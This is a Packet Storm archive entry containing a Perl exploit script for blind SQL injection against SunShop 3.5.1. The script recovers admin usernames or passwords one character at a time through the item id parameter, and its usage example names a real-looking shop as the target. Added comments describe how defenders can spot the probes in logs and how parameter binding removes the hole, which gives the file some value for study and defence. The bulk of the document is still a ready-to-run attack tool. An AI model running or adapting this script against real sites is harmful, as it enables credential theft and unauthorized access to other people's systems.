sunshop-blindsql.txt

2008-05-15T00:00:00
ID PACKETSTORM:66431
Type packetstorm
Reporter irvian
Modified 2008-05-15T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
use LWP::UserAgent;  
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection  
# scripts site : http://www.turnkeywebtools.com/sunshop/  
# Discovered  
# By : irvian  
# site : http://irvian.cn  
# email : irvian.info@gmail.com  
  
# Banner only: these prints are the sole output before the target is  
# contacted, and nothing here reads @ARGV.  
print "\r\n[+]-----------------------------------------[+]\r\n";  
print "[+]Blind SQL injection [+]\r\n";  
print "[+]SunShop Version 3.5.1 [+]\r\n";  
print "[+]code by irvian [+]\r\n";  
print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";  
print "[+]-----------------------------------------[+]\n\r";  
# Argument-count guard: fewer than five positional arguments aborts with  
# the usage text (written in Indonesian; the argument order it documents is  
# host, option, id, table, itemid). No further validation of the values is  
# done anywhere in the script.  
if (@ARGV < 5){  
die "  
  
Cara Mengunakan : perl $0 host option id tabel itemid  
  
Keterangan  
host : http://victim.com  
Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password  
id : Isi Angka Kolom id biasanya 1, 2 ,3 dst  
tabel : Isi Kolom tabel biasanya admin atau ss_admin  
itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=  
Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10  
\n";}  
  
  
# Positional arguments copied into undeclared package globals; the file has  
# no `use strict`, only the shebang's -w, so typos here would go unnoticed.  
$url = $ARGV[0];  
$option = $ARGV[1];  
$id = $ARGV[2];  
$tabel = $ARGV[3];  
$itemid = $ARGV[4];  
  
# Label for the value about to be printed. $option is compared as a string  
# (eq), so only the literal values 1 and 2 get a label; there is no else  
# branch, and the extraction loop below runs regardless of the option.  
if ($option eq 1){  
syswrite(STDOUT, "username: ", 10);}  
elsif ($option eq 2){  
syswrite(STDOUT, "password: ", 10);}  
  
# Character-by-character recovery over positions 1..32. For each position  
# the candidate codes 32..57 (space, punctuation, digits) are tried first,  
# then 97..122 (a-z); the first code for which blind() reports a hit is  
# written out and the position is considered done. If neither range yields  
# a hit, nothing at all is emitted for that position. $i, $f and $n are  
# package globals (no `my`).  
# Defender note: this loop issues up to 52 GET requests per character and  
# up to 32 characters per run, all against the same action=item URL with  
# only the injected CHAR() value changing -- a burst that is easy to spot  
# in access logs or rate-based alerting.  
for($i = 1; $i <= 32; $i++){  
$f = 0;  
$n = 32;  
while(!$f && $n <= 57)  
{  
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
if ($f==0){  
$n = 97;  
while(!$f && $n <= 122)  
{  
if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
}  
}  
print "\n[+]finish Execution Exploit\n";  
  
# blind($site, $op, $id, $tbl, $i, $n, $item) -- one boolean-oracle probe.  
#   $site  base URL of the shop; "/index.php?action=item&id=" is appended  
#   $op    1 selects the column "username", 2 selects "password"; any other  
#          value leaves $klm (a package global, never reset) untouched  
#   $id    value compared against the id column of $tbl  
#   $tbl   table name interpolated verbatim into the query  
#   $i     1-based character position passed to SUBSTRING()  
#   $n     character code compared through CHAR()  
#   $item  product id placed in front of the injected single quote  
# Returns 1 when the response body does NOT contain the phrase  
# "This product is currently not viewable", otherwise 0. The HTTP status  
# of $res is never checked, so a transport error or any other page that  
# happens to lack the phrase is also counted as a hit.  
# Defender notes: the probe is a plain GET, so the whole payload appears in  
# the web-server access log as the id= value of action=item. The URL-encoded  
# sequence "'%20AND%20SUBSTRING((SELECT%20" ... ")=CHAR(" ... ")/*" is the  
# string to alert on. The payload works by closing the id value with a  
# quote and commenting out the remainder with /*, which implies the id  
# parameter reaches the SQL statement unvalidated; rejecting non-integer  
# id values or binding the value as a query parameter removes the oracle.  
sub blind {  
my $site = $_[0];  
my $op = $_[1];  
my $id = $_[2];  
my $tbl = $_[3];  
my $i = $_[4];  
my $n = $_[5];  
my $item = $_[6];  
  
# Column name chosen by option; $klm is not declared with `my`.  
if ($op eq 1){  
$klm = "username";  
}  
elsif ($op eq 2){  
$klm = "password";  
}  
my $ua = LWP::UserAgent->new;  
# Injected condition: SUBSTRING(<column>, $i, 1) = CHAR($n) for the row  
# whose id equals $id; %20 stands for spaces, /* comments out the rest.  
my $url = "$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";  
my $res = $ua->get($url);  
my $browser = $res->content;  
# Oracle: the "not viewable" message means the injected condition was false.  
if ($browser !~ /This product is currently not viewable/i){  
return 1;  
}  
else {  
return 0;  
}  
  
}  
`